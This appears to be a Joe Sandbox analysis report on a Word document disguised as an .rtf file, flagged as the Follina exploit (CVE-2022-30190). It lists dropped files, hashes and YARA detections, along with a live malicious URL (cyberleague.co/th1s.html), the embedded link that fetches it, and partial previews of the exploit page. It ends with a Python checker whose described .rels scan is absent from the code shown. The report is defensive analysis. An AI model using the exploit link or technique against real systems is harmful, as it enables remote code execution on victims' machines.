                                                                                                                                                      https://augloop.office.com/v24EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://skyapi.live.net/Activity/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://clients.config.office.net/user/v1.0/mac4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                            high
ASN colour legend:
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
13.250.15.191 | cyberleague.co | United States | 16509 | AMAZON-02US | true
Joe Sandbox Version:35.0.0 Citrine
Analysis ID:639039
Start date and time:2022-06-03 23:02:03 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 10s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:20220531_180800.rtf
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:Potential for more IOCs and behavior
Number of new started processes analysed:28
Number of new started drivers analysed:1
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal72.expl.evad.winRTF@5/15@2/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .rtf
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): MpCmdRun.exe, mrxdav.sys, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.12.21, 52.109.76.34
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
No simulations
No context
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:Microsoft Access Database
Category:dropped
Size (bytes):528384
Entropy (8bit):0.47626507928862705
Encrypted:false
SSDEEP:384:xGfXucJCIG8SFifZ0jGBwehKW8wtZ1IEj+hVZO4Fg:0fXnCZHOZmC18/EQI
MD5:521477A5B543DCDBDF650506A2BEF2FB
SHA1:7396544D2B6EB329AA33FE532F23ADDEE7B26C3C
SHA-256:BD9D10557EBF81AEEAE73A07771E9B212F8F574AA1814AE50CF135FD813DC71A
SHA-512:91B1F89180A11D9D0465CC39EE9A1333972C1AEA6B814862192322B16A44DF32DE2D997515367FC02036061728AB9AEA0D834EAE2C3B67A1E36815E2BF376077
Malicious:false
Reputation:low
Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N-U.7...m.(...`.:{6^...Z.Cd..3..y[9.|*..|..... ..(..f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):36
Entropy (8bit):2.730660070105504
Encrypted:false
SSDEEP:3:5NixJlElGUR:WrEcUR
MD5:1F830B53CA33A1207A86CE43177016FA
SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
Malicious:false
Reputation:moderate, very likely benign file
Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.3860360556164644
Encrypted:false
SSDEEP:3:gdNSlNdaV:gG3u
MD5:705034BCC0EEF9FEDF492547A6248FDA
SHA1:582882F32AA3B4408443539B678D466383E7EBF7
SHA-256:19EC0E986BD9E829EE6FEB3FDFC5C52BBC0417294BF64EE33DF5D026E9C68F97
SHA-512:573B3B7328EB8875DDE1513A444D334CC07C1271766C064FCC396DCB337B1298888D23B0752CA1F927A2126AAAE6F1F3CD962E4E1BCCD4EE51C36DA7C0B064BB
Malicious:false
Reputation:low
Preview:768287. Admin.

Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):147863
Entropy (8bit):5.35893694438743
Encrypted:false
SSDEEP:1536:CcQW/gxgB5BQguw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:9HQ9DQW+zIXLI
MD5:CAD3616610DB963271F887DD70CC2E8F
SHA1:C24CC92A07D0846DD80F694620B9D17D765071F8
SHA-256:42F5BE14C77E0DDA5B870FFD88C8C03E9D43E6E630F125B1C2F1CE03CF98C9A6
SHA-512:E857B825E8592E7593CEF517BBE22514B873216664DA01980117B0E7580D0F70A0DC6D28FD009D7C84240E7EB403FE4AFA82FD87D942B9C5D84A3370C5DC9D90
Malicious:false
Reputation:low
Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-03T21:03:08">.. Build: 16.0.15330.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):5092
Entropy (8bit):1.5689266993578892
Encrypted:false
SSDEEP:12:hPlf7fguuuuuuuuuuuuuuuuuuuuuuuuuuuuuuyxH8d2GZfgGwf80K2GUJU6+LtSm:hP12dlRg7nfG/bLtF0ooS34BM3
MD5:DA03F3022C8E3A07A6F196216B29135E
SHA1:1F12DE0F50FF34CDB1C1BD99BCA553F7192FA416
SHA-256:87E5A464DE2F85A500F1B8D1028F5742F0903D9C0C3387DC572AAC8CF9027BCC
SHA-512:9E039948E2706E864656E1EE2D1CC659F60DC24A5964D220DA4409CCDC7815197F6E3636EC5CA43915BE70DA0A88888BE55B3EAA1F1AC828265D771145EF495E
Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm, Author: Joe Security
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:<!DOCTYPE html>..<html>..<body>.. <script>.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4980
                                                                                                                                                            Entropy (8bit):3.8087894377622136
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:cqZDMN7gsdBgLfVTped//HksYHGui3DAjG6kpJoApdHk/O:cqi7lBSTped//qH3i3DAqXLE/O
                                                                                                                                                            MD5:5B29927367C1C2BEBE25499E5602DE05
                                                                                                                                                            SHA1:10EB42142920A3299851F183D624731B910C6FCE
                                                                                                                                                            SHA-256:820E5CFE32DD64E31AEE40837BC3730B1B0F810787A7D3AAFC700191E6551C68
                                                                                                                                                            SHA-512:CD1E48056BDCBDD8CE2C0B7C8E15CA645D26FF372CA68D20D6B3078580943D4D5FA68FEE84A0C1AAC86F275ACE0059A3F76C2AF402EEC918C6680549BAB2C2EC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=0], progressive, precision 8, 750x500, frames 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):91933
                                                                                                                                                            Entropy (8bit):7.9892937833237845
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:7JCBhGCgBEFzvY1kH0R1ngxcrXo3N0rKL1nvFhbbrC3PJ4+6JaZB5:UBkCgBEZPml3rY3NBpvFRbAhOJi5
                                                                                                                                                            MD5:A53C5995856D35B0097F80E38D258D33
                                                                                                                                                            SHA1:31099B09DCCAC8C4A1BAA7E1F1B14E6C80FC516F
                                                                                                                                                            SHA-256:E87E50F77EEC96A1F0E37FCA345001474B3A023EAABC8DBE6FB1989DCFCDA543
                                                                                                                                                            SHA-512:92C0748B624D9C2C8941C7720EF34C7EF7793589C19517FA4AAAF40C5BE3DCDE3F7C601D1D2B142AED5EFA92E50E5B449B2A61AAB96D22FBBF2B2C9F0EEFA1F6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5092
                                                                                                                                                            Entropy (8bit):1.5689266993578892
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:hPlf7fguuuuuuuuuuuuuuuuuuuuuuuuuuuuuuyxH8d2GZfgGwf80K2GUJU6+LtSm:hP12dlRg7nfG/bLtF0ooS34BM3
                                                                                                                                                            MD5:DA03F3022C8E3A07A6F196216B29135E
                                                                                                                                                            SHA1:1F12DE0F50FF34CDB1C1BD99BCA553F7192FA416
                                                                                                                                                            SHA-256:87E5A464DE2F85A500F1B8D1028F5742F0903D9C0C3387DC572AAC8CF9027BCC
                                                                                                                                                            SHA-512:9E039948E2706E864656E1EE2D1CC659F60DC24A5964D220DA4409CCDC7815197F6E3636EC5CA43915BE70DA0A88888BE55B3EAA1F1AC828265D771145EF495E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm, Author: Joe Security
                                                                                                                                                            Preview:<!DOCTYPE html>..<html>..<body>.. <script>.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1536
                                                                                                                                                            Entropy (8bit):1.312888549670333
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:W4ofylIcElClbYS7plQalvbK/SterHr4PxZUttrasD3B9d4XsDRv1:9oal7MClc2HK/rLGZmra4Bn4X6N
                                                                                                                                                            MD5:451EC25F416BC912608235442FF2F166
                                                                                                                                                            SHA1:F888C9778D1C7EBF3866D0C58500DB59171DCBB3
                                                                                                                                                            SHA-256:334A4E952D4B5D75EEB8A85978592B6DA7147803188641EECF69A7A4726E858A
                                                                                                                                                            SHA-512:2F871BFB230404A4718D1AB1C96DB79EB617DE4689B2B7957246F5E12143E1688C0CC54B81DF214818F31463D4FC33E4F23D104F7D65424B335867B824457F1D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:..M.O.T.D.............L.I.N.K. .P.a.c.k.a.g.e. .".h.t.t.p.s.:././.c.y.b.e.r.l.e.a.g.u.e...c.o./.t.h.1.s...h.t.m.l.!.". .".". .\.b..... . ...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1024
                                                                                                                                                            Entropy (8bit):0.05390218305374581
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):5092
                                                                                                                                                            Entropy (8bit):1.5689266993578892
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:hPlf7fguuuuuuuuuuuuuuuuuuuuuuuuuuuuuuyxH8d2GZfgGwf80K2GUJU6+LtSm:hP12dlRg7nfG/bLtF0ooS34BM3
                                                                                                                                                            MD5:DA03F3022C8E3A07A6F196216B29135E
                                                                                                                                                            SHA1:1F12DE0F50FF34CDB1C1BD99BCA553F7192FA416
                                                                                                                                                            SHA-256:87E5A464DE2F85A500F1B8D1028F5742F0903D9C0C3387DC572AAC8CF9027BCC
                                                                                                                                                            SHA-512:9E039948E2706E864656E1EE2D1CC659F60DC24A5964D220DA4409CCDC7815197F6E3636EC5CA43915BE70DA0A88888BE55B3EAA1F1AC828265D771145EF495E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm, Author: Joe Security
                                                                                                                                                            IE Cache URL:https://cyberleague.co/th1s.html
                                                                                                                                                            Preview:<!DOCTYPE html>..<html>..<body>.. <script>.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:43 2022, mtime=Sat Jun 4 05:03:25 2022, atime=Sat Jun 4 05:03:05 2022, length=199522, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1080
                                                                                                                                                            Entropy (8bit):4.662475618409437
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:8JU0UQuElPCH2bQtfiYIeF+WVBUWQqAjAsg/2KYDwG5y35yp4t2Y+xIBjKZm:8+3t75BUBtAsgmDwj67aB6m
                                                                                                                                                            MD5:1A876E870976DC0047C960C625D6B81F
                                                                                                                                                            SHA1:E7CE531CEA5DF1032015A4C6B6F6A5512CB94918
                                                                                                                                                            SHA-256:816BBF82C865204A0FA8BC08FABD97B3E0ED6FC4D45E8D26BC2B8B956E592B6B
                                                                                                                                                            SHA-512:B978B808E8712EFD9B2DC27265915BB5ACCBF59148C2FF1DAC9CC9CBADC226DC289494297142C4E0D078DA38B22330C87270251EB5F8C7643A88FE776631C355
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview:L..................F.... ........3.......w.......w..b............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...TZ0....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..TZ0.....S....................D.;.h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..TZ0.....Y..............>.......'.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....t.2.b....Tc0 .202205~1.RTF..X......hT...Tc0....h.....................C...2.0.2.2.0.5.3.1._.1.8.0.8.0.0...r.t.f.......Y...............-.......X...........>.S......C:\Users\user\Desktop\20220531_180800.rtf..*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.2.0.2.2.0.5.3.1._.1.8.0.8.0.0...r.t.f.........:..,.LB.)...As...`.......X.......768287...........!a..%.H.VZAj...>............-..!a..%.H.VZAj...>............-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 96
Entropy (8bit): 4.639669008145431
Encrypted: false
SSDEEP: 3:bDuMJlHDInDdrFomxWIMovPDInDdrFov:bCBzNczy
MD5: C5F054026C8061C622BB0F1DAB7A99B0
SHA1: BD0930F6F9CF853909D7FDE6ED4690A517D456A3
SHA-256: E3805EFA3C64718616E0376881EA4E39FD164075412D0485F345138120AD9853
SHA-512: 15D8C875F424C633DCE521147A2583E3AC93D749B4E5771C64802488F0F04DFD405458AF5B235857BD94ADC326A06765A5968BDB516754E87536ED8C51EACB89
Malicious: false
Preview: [folders]..Templates.LNK=0..20220531_180800.rtf.LNK=0..[misc??????]..20220531_180800.rtf.LNK=0..

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.1027108526921086
Encrypted: false
SSDEEP: 3:Rl/ZdfXGMl9/nTRdttl/dptJ:RtZdWMldTRXdptJ
MD5: 0182DAC577AA3F876A2B371C3476C9DB
SHA1: 19149426C4E2513AE4D18C4CDD213B31CD04C4DF
SHA-256: AC5A33C45B852FEFAC49BA2A7E5808EF599902722B6A11E8FFF9310DFDA058F2
SHA-512: A6196D173F73408376470CC011FBCE00B27B53A40F4EF4C1AEF0AA43FEBF435B9036149B57A7E8DACF50568DF354EF527C74E7CEB87110ECA1D56D1077EE831A
Malicious: false
Preview: .pratesh................................................p.r.a.t.e.s.h.........+'qc.3........................../'uc-4..........................#'yc45..........T...

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.1027108526921086
Encrypted: false
SSDEEP: 3:Rl/ZdfXGMl9/nTRdttl/dptJ:RtZdWMldTRXdptJ
MD5: 0182DAC577AA3F876A2B371C3476C9DB
SHA1: 19149426C4E2513AE4D18C4CDD213B31CD04C4DF
SHA-256: AC5A33C45B852FEFAC49BA2A7E5808EF599902722B6A11E8FFF9310DFDA058F2
SHA-512: A6196D173F73408376470CC011FBCE00B27B53A40F4EF4C1AEF0AA43FEBF435B9036149B57A7E8DACF50568DF354EF527C74E7CEB87110ECA1D56D1077EE831A
Malicious: false
Preview: .pratesh................................................p.r.a.t.e.s.h.........+'qc.3........................../'uc-4..........................#'yc45..........T...

File type: Microsoft OOXML
Entropy (8bit): 7.9948510704789975
TrID:
• Word Microsoft Office Open XML Format document (49504/1) 49.01%
• Word Microsoft Office Open XML Format document (43504/1) 43.07%
• ZIP compressed archive (8000/1) 7.92%
File name: 20220531_180800.rtf
File size: 199522
MD5: 7b9c8e08371550238fbcd7cee1c8087d
SHA1: ff8c9deb358b2d22aa086cf36406461e8e9978b2
SHA256: b93326f795459d836c277730058e9923ab5f9bfbcef32e1c951e4a0d7538f9f5
SHA512: 962c4c0a48519ffa81a95771b25987cc6aeed4bb8737e1e5ab242233f849370d72675f08da3628270bad410659772f437209d7f02bed089b5a220f97314ec1f4
SSDEEP: 3072:LP/BkCPAXydgrYOUIr0XX95JQ7Anr5w2wJLWsk2n3rYxNYlT+MaJis19s9k:b/qXySM3XtQMnrq2Jon3MfYoL19s9k
TLSH: 7814131876E61EB9C60F3BB6B875A1076B9F0017EC14D2BF0C6065F98931964B670F8B
File Content Preview: PK..........!....iw...........[Content_Types].xml.T.n.0..W.? _#p.CUU!9t96..~.1.q.M...}.HQ........y..f........F.d..I...\.2%.....D>0.3i4.d..L'.7.......}J.!.GJ=_.b>1.4".q..<..Z.?Y..n8.....:... ..3.l-C....M.Lh.=5u.UJ..Rp.........(.....BJb$....@h.>..H_.*....n.
Icon Hash: 74f4c4c6c1cac4d8
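The static fields above pair an .rtf file name with an OOXML container: the content preview begins with the ZIP local-file header "PK" and names [Content_Types].xml, and TrID classifies the bytes as a Word Open XML document. The Python below is an added example, written for this page and not part of the Joe Sandbox report or of the analysed sample, of the two static checks those fields call for: comparing the extension against the byte signature, and scanning every .rels part inside the package for relationships marked TargetMode="External", which Word resolves outside the ZIP (a URL or UNC path) rather than to another part. The minimal package the script builds, and the URL inside it, are constructed for the demonstration; nothing is taken from the sample's own contents.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Byte signatures: a genuine RTF file starts with "{\rtf"; an OOXML document is
# a ZIP archive and therefore starts with the ZIP local-file header "PK\x03\x04".
RTF_MAGIC = b"{\\rtf"
ZIP_MAGIC = b"PK\x03\x04"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OOXML_EXTS = {"docx", "docm", "dotx", "dotm"}


def classify_by_magic(data: bytes) -> str:
    """Return 'rtf', 'docx', 'zip', 'zip-damaged' or 'unknown' from content alone."""
    if data.startswith(RTF_MAGIC):
        return "rtf"
    if not data.startswith(ZIP_MAGIC):
        return "unknown"
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = set(zf.namelist())
    except zipfile.BadZipFile:
        return "zip-damaged"
    if "[Content_Types].xml" in names and any(n.startswith("word/") for n in names):
        return "docx"
    return "zip"


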